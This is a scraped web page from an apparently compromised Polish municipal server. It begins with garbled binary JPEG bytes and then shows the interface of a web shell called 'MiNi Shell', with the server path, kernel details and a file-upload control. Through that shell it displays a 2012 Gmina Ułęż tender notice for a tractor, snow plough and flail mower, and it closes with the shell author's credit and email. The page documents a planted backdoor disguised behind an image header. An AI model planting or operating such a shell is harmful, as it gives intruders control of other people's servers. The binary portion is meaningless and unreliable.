JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120507/142232-N-2012.html

<p class="kh_header"><b>Ułęż: Zakup i dostawa nowego ciągnika rolniczego z osprzętem</b><br>
<b>Numer ogłoszenia: 142232 - 2012; data zamieszczenia: 07.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ułęż , Ułęż 168, 08-504 Ułęż, woj. lubelskie, tel. 0-81 8667916, 8667028, faks 0-81 8667028.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> https://ulez.eurzad.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa nowego ciągnika rolniczego z osprzętem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje:
1.1	 zakup i dostawę nowego ciągnika rolniczego o następujących parametrach i wyposażeniu:
- silnik 4 cylindrowy turbo, spełnia normy EURO 3,
- moc min 80 KM,
- regulacja elektroniczna silnika z pamięcią obrotów,
- skrzynia biegów synchronizowana z rewersem mechanicznym :min 12 p i 12 t,
- kabina komfortowa dwudrzwiowa z klimatyzacją ,
- drzwi kabiny otwierane z prawej i lewej strony,
- przednia i tylna szyba kabiny uchylna,
- udźwig podnośnika min.4000 kg,
- WOM o prędkością obrotową 540obr/min i 1000 obr/min,
-ogumienie : przód min.380/70 R24- tył min.480/70 R34,
- min. dwie pary gniazd hydrauliki zewnętrznej,
- reflektory robocze w dachu kabiny 2 przód i 2 tył,
- światło obrotowe  ostrzegawcze /kogut/,
- wycieraczka szyby przedniej i tylnej,
-	instalacja pneumatyczna do hamulców przyczepy / jedno i dwuprzewodowa /,
-	zaczep transportowy górny przesuwny,
-	dolny zaczep transportowy i zaczep rolniczy,
-	dolne ramiona TUZ z hakami, CBM
-	przedni TUZ o udźwigu min.2 t ,
-	siedzenie dla drugiej osoby potwierdzone świadectwem homologacji,
- tablica wyróżniająca do ruchu drogowego, gaśnica, trójkąt ostrzegawczy.

1.2 zakup i dostawę fabrycznie nowego pługa odśnieżnego 5-cio pozycyjnego o parametrach technicznych:
-	ilość segmentów lemiesza - 2 szt.,
-	podnoszenie odkładnicy - przedni TUZ,
-	skręt odkładnicy- hydraulicznie,
-	płynne ustawienie pługa za pomocą siłowników hydraulicznych /30 stopni/ w
 zależności od wykonywanej pracy,
-	wysokość  min.1000 cm,
-	funkcje pługa : łyżka- przepychanie śniegu -2,15- 2,47 m, dziobowa- przebijanie się przez zaspy- 2,24-2,5m,  lewo lub prawoskrętna-2,2-2,5m,
-	sterowanie pługiem przy pomocy joystica  z możliwością sterowania ręcznego,
-	wysokość robocza min.1000 cm,
-	dostosowanie do pracy z zaoferowanym ciągnikiem. 

1.3. zakup i dostawę fabrycznie nowej kosiarki bijakowej o parametrach technicznych:
-	szerokość robocza 180 cm,
-	ilość noży roboczych 18 szt,
-	możliwość ustawienia- tylno - boczne,
-	przestawienie mechaniczne  lub hydrauliczne,
-	wałek przekaźnika mocy,
-	dostosowanie do pracy z oferowanym ciągnikiem.

1.4 . Pozostałe wymagania dotyczące przedmiotu zamówienia:
- ciągnik rolniczy z osprzętem fabrycznie nowy, rok produkcji 2012,
- wszystkie podzespoły oraz elementy wyposażenia  montowane fabrycznie,
- ciągnik rolniczy oraz osprzęt w żadnym elemencie nie był wcześniej uszkodzony i został dopuszczony do ruchu przez właściwy organ,
- okres gwarancji udzielony przez Sprzedawcę minimum 24 m-ce, bez limitu mtg,
- serwis gwarancyjny sprawowany bezpośrednio przez Sprzedającego,
- stacjonarny serwis Sprzedającego winien znajdować się w odległości do 100 km
    od Zamawiającego,
- czas reakcji Sprzedającego na zgłoszenie serwisowe/naprawy nie dłużej jak 12 godzin,
- w cenie należy uwzględnić pierwszy oraz drugi przegląd gwarancyjny,
- koszt dostawy ciągnika z osprzętem pokrywa Sprzedawca,
- ciągnik rolniczy z osprzętem  zostanie dostarczony do siedziby Zamawiającego 
    tj.  Ułęż 168, 08-504   Ułęż .

1.5. W cenie oferty należy uwzględnić przeszkolenie operatorów pojazdu pod względem
    eksploatacyjnym oraz technicznym,
1.6. Dostarczony ciągnik z osprzętem musi być wyposażony w następujące dokumenty:
- świadectwo homologacji na terenie RP,
- gwarancja,
- fabryczna instrukcja obsługi ciągnika rolniczego i osprzętu w języku polskim wraz ze
wszystkimi dokumentami niezbędnymi do prawidłowej eksploatacji  przez Zamawiającego,
- protokoły wykonanych prób i badań laboratoryjnych jeśli były wykonywane,
- atesty na wbudowane w pojeździe urządzenia,
- dokumentacja UDT - jeśli jest wymagana,
- zaświadczenie o posiadanym ograniczniku prędkości (jeśli nie ma w wyciągu ze   
   świadectwa homologacji,
- wykaz autoryzowanych stacji serwisowych,
- katalog części zamiennych (w formie elektronicznej),
- komplety kluczy w liczbie dostarczonej przez producenta,
- książkę serwisową w języku polskim.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 16.70.00.00-2, 16.11.00.00-9, 16.31.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku udziału w postępowaniu będzie polegać na
sprawdzeniu kompletności i zgodności złożonych dokumentów i oświadczeń według zasady spełnia/ nie spełnia.
Przed oceną ofert, zamawiający sprawdzi formalną stronę uczestnictwa wykonawcy
w postępowaniu i określi czy każdą z ofert spełnia wymagane warunki</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku udziału w postępowaniu będzie polegać na
sprawdzeniu kompletności i zgodności złożonych dokumentów i oświadczeń według zasady spełnia/ nie spełnia.
Przed oceną ofert, zamawiający sprawdzi formalną stronę uczestnictwa wykonawcy
w postępowaniu i określi czy każdą z ofert spełnia wymagane warunki</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku udziału w postępowaniu będzie polegać na
sprawdzeniu kompletności i zgodności złożonych dokumentów i oświadczeń według zasady spełnia/ nie spełnia.
Przed oceną ofert, zamawiający sprawdzi formalną stronę uczestnictwa wykonawcy
w postępowaniu i określi czy każdą z ofert spełnia wymagane warunki</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku udziału w postępowaniu będzie polegać na
sprawdzeniu kompletności i zgodności złożonych dokumentów i oświadczeń według zasady spełnia/ nie spełnia.
Przed oceną ofert, zamawiający sprawdzi formalną stronę uczestnictwa wykonawcy
w postępowaniu i określi czy każdą z ofert spełnia wymagane warunki</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku udziału w postępowaniu będzie polegać na
sprawdzeniu kompletności i zgodności złożonych dokumentów i oświadczeń według zasady spełnia/ nie spełnia.
Przed oceną ofert, zamawiający sprawdzi formalną stronę uczestnictwa wykonawcy
w postępowaniu i określi czy każdą z ofert spełnia wymagane warunki</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>. Dokumenty wymagane w przypadku składania oferty wspólnej
a. dokument potwierdzający ustanowienie pełnomocnika do reprezentowania ich
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu
i zawarcia umowy w sprawie zamówienia publicznego, o ile ustanowienie
pełnomocnika nie jest zawarte w umowie konsorcjum;
b. dokumenty potwierdzające, e wykonawca posiada uprawnienia do wykonywania
określonej działalności oraz e nie podlega wykluczeniu na podstawie art. 24 ustawy -
Prawo zamówień publicznych dla każdego partnera z osobna, pozostałe dokumenty
składane są wspólnie.
Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii
potwierdzonych za zgodność przez osobę/osoby/ uprawniona/e/ do podpisania oferty
z dopiskiem za zgodność z oryginałem.
c. Warunki w oparciu o art. 22 ust.1 ustawy Pzp, o których mowa w rozdziale VIII pkt 1
SIWZ podmioty składające ofertę wspólna, jako konsorcjum, mogą spełniać łącznie.
Natomiast warunki z art. 24 ustawy Pzp każdy z wykonawców z osobna musi wykazać
brak podstaw do wykluczenia.
d. przed podpisaniem umowy (w przypadku wygrania przetargu) wykonawcy składający
ofertę wspólna będą mieli obowiązek przedstawić zamawiającemu umowę konsorcjum,
która będzie spełniała następujące wymagania:
-Umowa konsorcjum musi być zawarta na okres nie krótszy ni czas realizacji zamówienia wraz z okresem rękojmi lub gwarancji, w zależności od tego, który termin jest dłuższy;
-Umowa konsorcjum musi jasno precyzować cel gospodarczy, w jakim została ona
zawarta;
-Umowa musi wskazywać reprezentanta (lidera) konsorcjum;
-Umowa nie może dopuszczać możliwości jej wypowiedzenia przez któregokolwiek
z jego członków w trakcie realizacji zamówienia wraz z okresem gwarancji/rękojmi;
-Zakazuje się zmian w zawartej umowie bez zgody zamawiającego;
-Wszelkie rozliczenia finansowe (płatności faktur) zamawiający dokonywać będzie z
liderem konsorcjum;
-Z umowy musi wynikać, i członkowie konsorcjum odpowiadają solidarnie.

6. Podwykonawcy
a. W przypadku, gdy Wykonawca zamierza powierzyć wykonanie części zamówienia
podwykonawcy, winien w ofercie wskazać ilość, rodzaj i wartość robót jakie zleci
podwykonawcy. Umowa z podwykonawca wymaga dla swej ważności zgody Zamawiającego.
b. Jeżeli Wykonawca nie deklaruje w ofercie zatrudnienia podwykonawców,
zamawiający przyjmuje, że przedmiot zamówienia zostanie wykonany samodzielnie
przez wykonawcę. Powyższe dokumenty powinny zostać złożone w postaci oryginału lub kopii poświadczonej za zgodność z oryginałem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ulez.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład komunalny Ułęż
Ułęż 168
08-504 Ułęż.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2012 godzina 09:00, miejsce: Zakład komunalny Ułęż
Ułęż 168
08-504 Ułęż.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com